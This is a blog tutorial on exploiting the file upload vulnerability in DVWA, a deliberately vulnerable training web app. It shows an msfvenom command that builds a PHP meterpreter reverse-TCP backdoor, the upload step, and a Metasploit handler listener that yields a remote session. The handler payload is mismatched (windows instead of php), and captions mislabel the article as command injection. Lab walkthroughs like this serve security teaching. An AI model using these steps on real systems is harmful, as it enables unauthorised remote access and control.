File upload vulnerability Exploitation in DVWA


Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students & teachers to learn about web application security in a controlled class room environment.

The aim of DVWA is to practice some of the most common web vulnerabilities, with various levels of difficulty, with a simple straightforward interface. Please note, there are both documented and undocumented vulnerabilities with this software. This is intentional. You are encouraged to try and discover as many issues as possible.


Step 1. Give permission to /var/www/html/DVWA/hackable/uploads/


Command Injection Exploitation in DVWA


Step 2. Lets understand file upload vulnerability. In fact, one of the major risks faced by web applications is the potential to get a malware or a malicious code.

The ultimate goal of an attacker is to get some code in a website they desire to attack. They aim at executing a malicious code inside the website.


Command Injection Exploitation in DVWA


Step 3. Open the kali linux terminal and type ifconfig.


Command Injection Exploitation in DVWA


Step 4. Click on DVWA Security and set Website Security Level low

Open terminal in kali linux and create php backdoor through following command

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.136.129 lport=4444 -f raw

Copy and paste the highlighted code in leafpad

Command Injection Exploitation in DVWA


Step 5. And save as with PHP extension as file.php on the desktop.


Command Injection Exploitation in DVWA


Step 6. click to file upload option from vulnerability menu.

Now click on browse tag to browse file.php file to upload it on web server and click on upload which will upload your file on web server.


Command Injection Exploitation in DVWA

Step 7. This is msfconsole. Msfconsole is the main interface to MetaSploit. There are GUI interfaces (armitage), and a web interface too (websploit). With msfconsole, you can launch exploits, create listeners, configure payloads etc.



Metasploit Tutorials From Basic to Advance

Command Injection Exploitation in DVWA


Step 8. Now use multi hanlder exploit and reverse tcp payload and we need to set the LHOST and LPORT.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.136.129

set lport 4444

exploit

Command Injection Exploitation in DVWA


Step 9. After uploading the PHP file it will show the path of directory where your file is successfully uploaded now copy the selected part and paste it in URL to execute it.

hackable/uploads/file.php


Command Injection Exploitation in DVWA


Step 10. After that you have got a meterpreter session 1 of victim PC on the metasploit.

Command Injection Exploitation in DVWA


Step 11. Type sysinfo to check the target system information.

Command Injection Exploitation in DVWA


For References :-




I hope you enjoyed this article.



Sharing is caring

google
linkedin

About Author

Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security. Get in touch with him by sending an email (akashchugh1994@gmail.com).


You may also like :-




Leave a Comment

Your email address will not be published. Required fields are marked *




Stay Connected

Popular Posts

Get Latest Stuff Through Email


Who Should Read TechTrick?

All the tricks and tips that TechTrick provides only for educational purpose. If you choose to use the information in TechTrick to break into computer systems maliciously and without authorization, you are on your own. Neither I (TechTrick Admin) nor anyone else associated with TechTrick shall be liable. We are not responsibe for any issues that caused due to informations provided here. So, Try yourself and see the results. You are not losing anything by trying... We are humans, Mistakes are quite natural. Here on TechTrick also have many mistakes..